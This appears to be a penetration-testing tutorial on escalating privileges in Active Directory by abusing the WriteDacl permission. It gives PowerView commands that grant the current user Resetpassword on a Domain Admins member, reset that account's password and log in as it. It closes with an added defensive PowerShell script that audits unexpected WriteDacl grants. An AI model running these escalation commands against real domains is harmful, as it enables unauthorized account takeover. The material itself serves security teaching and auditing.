WriteDacl
WriteDacl is a permission that allows you to modify an object's ACEs. If you have WriteDacl on a user object, you can give yourself a right, e.g. Resetpassword, that allows you to reset the user's password, thereby escalating your privileges.
Enumeration
PowerView
WriteDacl Enumeration
Get your current user's SID by executing whoami /user, import PowerView, then execute the below command to get the list of objects on which you have the WriteDacl right.
Command
get-objectacl -resolveguids | ? {($_.securityidentifier -eq "[your_current_user_sid]") -and ($_.activedirectoryrights -like "*WriteDacl*")}
The below image shows that the current user usman has the WriteDacl right on the user object ali.
User Enumeration
Execute the below command to get more information about the target user.
Command
get-netuser [target_user]
The below image shows that the target user ali is a member of Domain Admins.
BloodHound
You can also get the same result using BloodHound.
The below image shows that the current user usman has the WriteDacl right on the user object ali, who is a member of Domain Admins.
Exploitation
PowerView
Give Resetpassword Right
Execute the below command to give yourself the Resetpassword right.
Command
add-domainobjectacl -TargetIdentity [target_user] -PrincipalIdentity [Your Current User] -Rights Resetpassword
You can verify it using the below command.
Command
get-objectacl -resolveguids | ? {$_.securityidentifier -eq "[your_current_user_sid]"}
Reset Password
With the Resetpassword right given, you can reset the target user's password and log in to the account by executing the below commands.
Command
$pass = ConvertTo-SecureString '[Your New Password Here]' -AsPlainText -Force
set-domainuserpassword -identity [target_user] -accountpassword $pass
runas /user:[domain\user] cmd.exe
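Defensive audit
The grant shown above leaves an explicit ACE on the target object, so the same DACLs can be reviewed from the defender's side. The script below is an added example, not part of the original page: it lists principals holding WriteDacl on members of Domain Admins. It assumes the RSAT ActiveDirectory module is installed; the $expected allow-list is a constructed baseline to adjust for your environment.

```powershell
# Added example (defensive audit), not code from the original page.
# Assumes the RSAT ActiveDirectory module and read access to the directory.
Import-Module ActiveDirectory
Add-Type -AssemblyName System.DirectoryServices

$netbios = (Get-ADDomain).NetBIOSName

# Assumption: principals expected to hold WriteDacl on privileged accounts.
# This baseline is constructed for illustration; tune it for your domain.
$expected = @(
    'NT AUTHORITY\SYSTEM',
    'BUILTIN\Administrators',
    "$netbios\Domain Admins",
    "$netbios\Enterprise Admins"
)

$writeDacl = [System.DirectoryServices.ActiveDirectoryRights]::WriteDacl

# Privileged users whose DACLs are reviewed (nested group members included).
$targets = Get-ADGroupMember -Identity 'Domain Admins' -Recursive |
    Where-Object { $_.objectClass -eq 'user' }

$findings = foreach ($t in $targets) {
    $acl = Get-Acl -Path ("AD:\" + $t.distinguishedName)
    foreach ($ace in $acl.Access) {
        # GenericAll includes the WriteDacl bit, so it is reported as well.
        $hasWriteDacl = ($ace.ActiveDirectoryRights -band $writeDacl) -ne 0
        $isAllow      = $ace.AccessControlType -eq 'Allow'
        $unexpected   = $expected -notcontains $ace.IdentityReference.Value

        if ($isAllow -and $hasWriteDacl -and $unexpected) {
            [pscustomobject]@{
                Target    = $t.SamAccountName
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.ActiveDirectoryRights
                Inherited = $ace.IsInherited
            }
        }
    }
}

# Each row is a principal outside the baseline that can rewrite the target's DACL.
$findings | Sort-Object Target, Principal | Format-Table -AutoSize
```

A row such as usman holding WriteDacl on ali, as in the scenario above, would appear here with Inherited set to False if the ACE was set directly on the user object.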